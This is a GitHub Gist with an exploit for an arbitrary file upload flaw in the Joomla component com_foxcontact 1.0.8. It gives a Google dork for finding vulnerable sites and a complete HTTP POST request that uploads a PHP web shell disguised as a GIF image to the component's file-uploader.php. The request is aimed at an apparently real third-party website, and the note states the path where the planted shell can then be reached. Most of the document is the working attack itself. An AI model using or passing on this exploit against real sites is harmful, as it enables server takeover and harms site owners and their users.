Created
September 30, 2013 20:03
-
-
Save infoslack/6769346 to your computer and use it in GitHub Desktop.
exploit arbitrary file upload - joomla
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit Title: Joomla Component (com_foxcontact) Arbitrary File Upload Vulnerability | |
# Author: DaOne aka MockingBird | |
# Vendor Homepage: http://www.fox.ra.it/ | |
# Price: €10 | |
# Category: webapps/php | |
# Version: 1.0.8 | |
# Google dork: inurl:index.php?option=com_foxcontact | |
------------------------------------------------------------------------ | |
# Exploit | |
-HTTP Header Example- | |
POST http://www.res.cat/particulars/components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php HTTP/1.1 | |
Host: www.res.cat | |
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate | |
X-Requested-With: XMLHttpRequest | |
X-File-Name: shell.php | |
Content-Type: image/jpeg | |
Connection: keep-alive | |
Pragma: no-cache | |
Cache-Control: no-cache | |
GIF89a<?php shell ?> | |
---------------- | |
Shell path: /components/com_foxcontact/uploads/{hash}_{filename}.php |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment